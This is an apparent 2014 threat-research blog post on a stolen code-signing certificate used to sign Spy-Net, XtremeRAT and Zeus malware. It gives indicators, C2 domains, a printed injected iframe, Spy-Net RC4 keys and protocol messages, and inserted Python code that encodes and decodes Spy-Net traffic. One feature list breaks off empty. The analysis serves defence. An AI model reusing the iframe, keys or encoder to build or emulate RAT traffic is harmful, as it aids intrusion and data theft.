Malware authors are always looking for new ways to masquerade their
actions. Attackers are looking for their malware to be not only fully
undetectable, but also appear valid on a system, so as not to draw
attention. Digital signatures are one way malware authors keep under
the radar. Digital signatures are an easy, quick way to verify the
authenticity of an application utilizing the signature.
Threat actors routinely steal digital signing certificates to hide in
plain sight. There are recent reports of banking Trojans such as Zeus
(https://blogs.comodo.com/e-commerce/comodo-av-labs-id-zeus-trojan/)
using valid signatures to get past both automated and human defenses.
Part of performing accurate threat intelligence is
continually looking to the past to help better predict the future.
This is proven in the samples we will be discussing in this blog. Many
of the samples throughout this blog are from the summer of 2013. These
particular samples however, piqued our interest because of the mass
distribution of RATs in a particular targeted region. It also reminded
us of a recent XtremeRAT blog
(/content/fireeye-www/en_US/blog/threat-research/2014/02/xtremerat-nuisance-or-threat.html)
we published earlier in 2014.
The Little Signature That Could
While investigating an uptick in Spy-Net spam campaigns, we came
across a digitally signed malware binary that caught our
interest. Spy-Net allows an attacker to interact with the victim via a
remote shell to upload/download files, interact with the registry,
running processes and services, as well as capture images of the
desktop and record from the webcam and audio. It also contains
functionality to extract saved passwords and turn the victim into a
proxy server. During the build process, an attacker can choose to
enable a keylogger and evasion functionality designed to stop the
infection process if a debugger or virtual machine is found.
We noticed that one of the Spy-Net binary files, sc2.exe (MD5:
6a56f6735f4b16a60f39b18842fd97d0), upon closer inspection, was
utilizing a valid digital signature, from a company called CZ Solution
Co. Ltd.
Figure 1: Signature Details of sc2.exe
Looking closer at the signature, we noticed that all of the details
were intact, and appeared to be valid. There are two additional
code-signing certificates issued to CZ Solution Co. Ltd.
Figure 2: Additional Signature Details
Investigation of sc2.exe showed typical Spy-Net behaviors. The sample
beaconed out to ekinox.no-ip.info. From here, we decided to
pivot off the CZ Solution signature and see what we could find.
Connections Emerge
As we started to pivot off the CZ Solution signature, we started to
see some interesting commonalities. Pivoting proved that the CZ
Solution signature was not just used in Spy-Net binaries. We quickly
found that this signature was being used with XtremeRAT, a popular RAT
that cybercriminals and targeted attackers use regularly. The code of
XtremeRAT is shared amongst several other Delphi RAT projects
including Spy-Net, CyberGate, and Cerberus.
XtremeRAT allows an attacker to:
One binary for instance, m.exe (MD5:
c27232691dacf4cff24a4d04b3b2896b) which was XtremeRAT, was seen
beaconing out to http://omegaphotography.[co].uk,
batardchris.servehttp.com /1234567890.functions, and www.batteurmag.com/[plugin].xtr.
Likewise, we saw multiple samples of the Zeus Trojan utilizing the CZ
Solution signature. Zeus modifiers can tune Zeus to steal the information
they are interested in; typically login credentials for online social
networks, e-mail accounts, online banking or other online financial
services. Zeus is commonly seen
targeting customers of financial institutions.
One of the Zeus samples, uk.exe (MD5:
dcd3e45d40c8817061f716557e7a05b6) that was utilizing the CZ Solution
signature, was beaconing out to claire-morin.com/file.php.
Looking at the three samples shows that CZ Solution was used to create
and sign Spy-Net, XtremeRAT, and Zeus samples. Graphing out the
connections between the samples we profiled, you can quickly see how
fast this web of similarities continues to grow.
Figure 3: Connection Profile of Binaries Using CZ Solution
The French Connection and C2 overlap
Attribution of actors and/or campaigns can often be a difficult and
tedious task. However, since we were dealing with so many
intertwining binaries, we could start to draw some parallels between samples.
When looking at the overall connections between the CZ Solution
signature, you can start to see a trend emerge. First, there is some
C2 overlap. For instance Dllsv.exe (MD5:
3f042fd6b9ce7e23b3c84c6f7323dd75) communicates out to
ekinox.no-ip.info, using the same CZ Solution cert. This malware is
flagged as BozokRAT; a user-friendly RAT that can upload and download
files to and from a computer, modify registry entries, and perform
other typical RAT functions. That same C2, ekinox.no-ip.info, is also
seen used by the aforementioned Spy-Net binary, sc2.exe (MD5: 6a56f6735f4b16a60f39b18842fd97d0).
In another example of C2 overlap, a file named uk.exe, (MD5:
9c11ef09131a3373eef5c9d83802d56b) uses its C2 as
omega-photography.co.uk. This sample is an active Zeus binary. That
same C2 is used with a file named x.exe, (MD5:
c27232691dacf4cff24a4d04b3b2896b), an active XtremeRAT binary.
Next, we needed to identify at least one infection vector to ensure
we could track how one of the binaries using the CZ Solution signature
was getting into environments.
In one case, we found the infection vector for an XtremeRAT binary
that was using the CZ Solution certificate. The binary came in the
form of phished email (MD5: 7c00ba0fcbfee6186994a8988a864385)
purportedly from Armani regarding an order.
The email was in French and the headers were interesting, as the same
sender has been seen in multiple French spam runs
(http://www.projecthoneypot.org/ip_212.227.126.130).
The attachment in the email uses the RTLO trick
(http://blog.malwarebytes.org/online-security/2014/01/the-rtlo-method/)
to disguise a 7zip file as a PDF.
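To make the RTLO trick concrete, here is an added example (not code from the post) that models how a bidi-aware file browser renders a name containing U+202E and flags an attachment whose displayed extension differs from the one the OS will actually use. The sample filename is constructed for illustration.

```python
# Unicode bidi controls; U+202E (RIGHT-TO-LEFT OVERRIDE) is the one the RTLO trick relies on.
RLO = "\u202e"
BIDI_CONTROLS = {"\u202a", "\u202b", "\u202c", "\u202d", "\u202e",
                 "\u2066", "\u2067", "\u2068", "\u2069"}


def displayed_name(filename: str) -> str:
    """Approximate what a bidi-aware file manager or mail client draws: the control itself is
    invisible and everything after the first RLO is rendered right-to-left, i.e. reversed."""
    if RLO not in filename:
        return filename
    head, tail = filename.split(RLO, 1)
    return head + tail[::-1]


def extension_of(name: str) -> str:
    """Extension as the part after the last dot, lower-cased; empty if there is no dot."""
    return name.rsplit(".", 1)[-1].lower() if "." in name else ""


def check_attachment_name(filename: str) -> dict:
    """Gateway-style check: compare the extension a user would see with the one the OS will use."""
    raw = "".join(ch for ch in filename if ch not in BIDI_CONTROLS)
    shown = displayed_name(filename)
    shown_ext, real_ext = extension_of(shown), extension_of(raw)
    has_controls = any(ch in BIDI_CONTROLS for ch in filename)
    return {"displayed": shown, "displayed_ext": shown_ext, "real_ext": real_ext,
            "suspicious": has_controls and shown_ext != real_ext}


# Constructed sample (not from the post): a .7z archive whose name reads as a .pdf when rendered.
SAMPLE_ATTACHMENT = "Commande_Armani_" + RLO + "fdp.7z"
```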
While looking at all the samples we correlated and pivoted off
of, we found that a majority of both the language and C2's being used
all revolved around the French language. The domains that were part of
the C2 infrastructure were almost all exclusively French, as was the
registrant information for the domains in question.
Spy-Net C2 Protocol Analysis
As we have already shared some analysis details of XtremeRAT in a previous
blog (/content/fireeye-www/en_US/blog/threat-research/2014/02/xtremerat-nuisance-or-threat.html),
we decided to share some information and tools we built
regarding Spy-Net this time. This information is based on our analysis
of Spy-Net version 2.6 specifically. Other versions of Spy-Net may
have significant changes to the protocol. Spy-Net 2.6 utilizes a
homegrown protocol like many other publicly available RATs. It’s an
ASCII based, pipe-delimited protocol utilizing Portuguese keywords
that employs two totally different forms of obfuscation: one for
outbound communication to the attacker and another for inbound
communication to the implant. The outbound communications are
compressed with zlib and encrypted with RC4. The RC4 key is hard-coded
and is updated with version changes. For example, the RC4 key for
Spy-Net 2.6 is njkvenknvjebcddlaknvfdvjkfdskv, while for
CyberGate 1.07, which has a similar (if not the same) protocol the key
is njgnjvejvorenwtrnionrionvironvrnvcg107 and CyberGate 1.18’s
key is njgnjvejvorenwtrnionrionvironvrnvcg117.
The astute reader may have noticed that the last three numbers of the
CyberGate keys (roughly) represent the version number of CyberGate.
The inbound communication to the implant employs an ASCII encoding
scheme similar to Base64. This protocol begins with a simple
authentication scheme where the implant sends an authentication
password that is validated by the client. This password is
configurable by the attacker and defaults to abcd1234. The
implant then proceeds to send the entirety of its configuration
information, as configured by the attacker, to the client so it can be
displayed on its “Configuration” tab.
Authentication
Implant->Client: mypassword|Y|
Configuration Request and Response
Client->Implant: configuracoesdoserver|
Implant->Client:
configuracoesdoserver|configuracoesdoserver|192.168.1.2:81|#myID|mypassword|C:\WINDOWS\install\server.exe|C:\Program
Files\Internet Explorer\iexplore.exe| |
|{0OP8GNN1-GIWW-CC7M-AJ0I-6Y554UOJJ241}|Policies|FALSE|TRUE|TRUE|TRUE|***MUTEX***|
| |TRUE|FALSE| | | | | | |FALSE|FALSE|FALSE|FALSE|FALSE|FALSE|FALSE|FALSE|FALSE|FALSE|FALSE|FALSE|FALSE|server.exe#crack.exe#|FALSE|
The outbound communications from the implant to the client are
prepended with an ASCII representation of the length of the payload
followed by a pipe character and a new line character.
There is a noticeable lack of
sophistication in Spy-Net’s code. For example, in some cases the
length indicator is followed by a pipe and a single new line (\n)
character as seen in *nix based operating systems. In other cases, the
indicator is followed by the carriage return and new line characters
(\r\n), as seen in Windows operating systems. This lack of conformity
is also witnessed in how there are two totally different schemes used
for obfuscation, and in how obfuscation is not used for file transfers
as it is otherwise used throughout the protocol.
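The following is an added example, not the ChopShop module or any code from the post, that implements the outbound (implant to client) framing and obfuscation described above: pipe-delimited ASCII fields, zlib compression, RC4 with the Spy-Net 2.6 key quoted in the post, and a length header terminated by either "\n" or "\r\n". It assumes the header length counts the obfuscated payload bytes, which the post does not state, and the messages it builds are constructed samples.

```python
import re
import zlib

# RC4 key for Spy-Net 2.6, as given in the post; other versions change the key.
SPYNET_26_KEY = b"njkvenknvjebcddlaknvfdvjkfdskv"
# Frame header: ASCII decimal length, a pipe, then either "\n" or "\r\n" (both seen in samples).
FRAME_HEADER = re.compile(rb"^(\d+)\|\r?\n")


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA). Encryption and decryption are the same operation."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def obfuscate_outbound(fields, key=SPYNET_26_KEY, newline=b"\r\n") -> bytes:
    """Build one implant->client frame: pipe-join, zlib-compress, RC4-encrypt, prepend header.
    Assumption (not stated in the post): the header length counts the obfuscated payload bytes."""
    plaintext = b"|".join(f.encode("latin-1") for f in fields) + b"|"
    payload = rc4(key, zlib.compress(plaintext))
    return str(len(payload)).encode("ascii") + b"|" + newline + payload


def decode_outbound(stream: bytes, key=SPYNET_26_KEY):
    """Walk a captured implant->client byte stream frame by frame and recover the fields.
    Returns a list of messages, each a list of pipe-delimited fields (trailing pipe dropped)."""
    messages = []
    pos = 0
    while pos < len(stream):
        header = FRAME_HEADER.match(stream[pos:])
        if header is None:
            raise ValueError(f"no length header at offset {pos}")
        length = int(header.group(1))
        start = pos + header.end()
        payload = stream[start:start + length]
        if len(payload) != length:
            raise ValueError(f"truncated frame at offset {pos}")
        plaintext = zlib.decompress(rc4(key, payload))
        messages.append(plaintext.decode("latin-1").split("|")[:-1])
        pos = start + length
    return messages
```

A wrong key (for example a different Spy-Net or CyberGate build) surfaces as a zlib error rather than silently yielding garbage, which is a useful sanity check when trying keys against a capture.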
Spy-Net Protocol Decoder
Since Spy-Net is a publicly available RAT that we see in use quite
often, we decided to build a ChopShop module for it and share it in
cooperation with our friends at MITRE. The module is now available as
a standard part of the framework, available on GitHub
(https://github.com/MITRECND/chopshop). We are also sharing a Spy-Net
configuration dumping pycommand for Immunity Debugger
(https://github.com/fireeye/pycommands). While hunting for
related samples in VirusTotal, we came across a pcap that had captured
the initial infection and subsequent communication of the Spy-Net
binary we initially mentioned, (MD5:
6a56f6735f4b16a60f39b18842fd97d0). This gave us a great opportunity to
test our new decoder. One thing that Spy-Net implants will commonly
send out automatically is a thumbnail image of the user’s desktop.
This is displayed on the client.
Our decoder can extract such images from
the pcap and what we found gave us a further hint that we may be
dealing with attacks focused in France. Although difficult to read due
to the very low resolution of the thumbnail, our pcap decoder was able
to tell us that the title of the browser window currently open in this
screenshot is "Football - MAXIFOOT l'actualité foot et transfert -
Windows Internet Explorer.”
Distribution via Malicious Java Applet
According to the details of the pcap we decoded, this French football
Web site (maxifoot.fr) was apparently compromised and had an iframe
inserted into it that pointed to another compromised Web site, a
Canadian addiction recovery resource: unwasted.ca.
<iframe width="1px" height="1px"
src="hxxp://unwasted.ca/skins/index.html"
style="display: block;" ></iframe>
The latter site hosted a malicious Java applet that downloaded the
Pony/Fareit malicious downloader. The downloader then proceeded to
install ZeuS and download and execute the aforementioned Spy-Net
binary. All of these binaries were signed with the stolen digital
certificate. The malicious Java applet used to install the Pony
downloader was created by Foxxy Software and had been previously written
about by ESET (http://www.welivesecurity.com/2012/08/07/foxxy-software-outfoxed/).
RAT Configuration Details
We assembled a compilation of the meaningful configuration data found
in the XtremeRAT and Spy-Net samples we came across in our analyses.
You can observe some similarities between the samples’ configurations.
MD5 | Version | Dir/Path | ID | Group | Mutex | Password
f5e6c0a2c9000311513521947a76cb4b | Spy-Net 2.6 | C:\WINDOWS\system32\conhost\conhost.exe | Updater2014 | NA | R5438NM5 | abcd1234
6a56f6735f4b16a60f39b18842fd97d0 | Spy-Net 2.6 | C:\WINDOWS\system32\Winini\taskhost.exe | Uframer | NA | A7TF5W | abcd1234
7416ec2889227f046f48c15c45c102da | XtremeRAT 3.5 Private | InstallDir | SpaM | SPAM | eyA8znpc | NA
2e776e18dec61cf6ccd68fbacd55fab3 | XtremeRAT 3.5 Private | svhost | Diesel | Diesel | lNFAH0 | NA
be47ec66d861c35784da527bf0f2e03a | XtremeRAT 3.5 Private | svhost | IdSec | USA3 | lNFAH0 | NA
c27232691dacf4cff24a4d04b3b2896b | XtremeRAT 3.5 Private | InstallDir | IdSec | idsection | eyA8znpc | NA
e79636e4c7418544d188a29481c100bb | XtremeRAT 3.5 Private | svhost | IdSec | USA3 | lNFAH04 | NA
bd70a7cae3ebf85cf1edd9ee776d8364 | XtremeRAT 3.5 Private | svhost | IdSec | IdSec | lNFAH0 | NA
0be3b0e296be33903bf76b8cd9cf52ca | XtremeRAT 3.5 Private | svhost | CiTa | IdSec | x4KybsbM | NA
Conclusion
The usage of digital signatures isn't going to decrease anytime soon,
especially by threat actors. It gives them a quick, easy way to bypass
traditional security controls since certificates and signatures are
typically trusted by default. This blog shows that this trend still
holds. We looked towards the past in this blog, to better
understand motivations and trends going forward. We can accurately
say, based on the information attributed, that the CZ Solution
signatures were being utilized by an individual or group of
individuals using French assets and infrastructure.
These particular actors didn’t show a significant level of expertise,
but did show collective resources with knowledge in at least Zeus,
Spy-Net, and XtremeRAT. We can say accurately that it is likely these
actor(s) were using the same signature to send out a wide range of
binaries, possibly even outside of the realm of the four families
discussed here. As we wrote this blog, we couldn’t help but be
reminded of the spam run focused in Colombia and Central America that
we wrote about back in February of this year
(/content/fireeye-www/en_US/blog/threat-research/2014/02/xtremerat-nuisance-or-threat.html). A spam run that is
regionally focused, but with no apparent targeting in nature,
utilizing a mix of ZeuS and off-the-shelf RATs.
Helping protect your organization from threats using valid digital
signatures can include verification of the signature’s serial number.
In this case, the serial number: 6e 7b 63 95 ac 5b 5c 8a 2a ec c4 52
8d 9e 65 10, is the identifier to locate in regards to this publisher.
Also, if you’re running your own internal certificate authority,
ensure you are adequately revoking certificates that may have been
compromised. This will help ensure compromised certificates are not
utilized in attacks.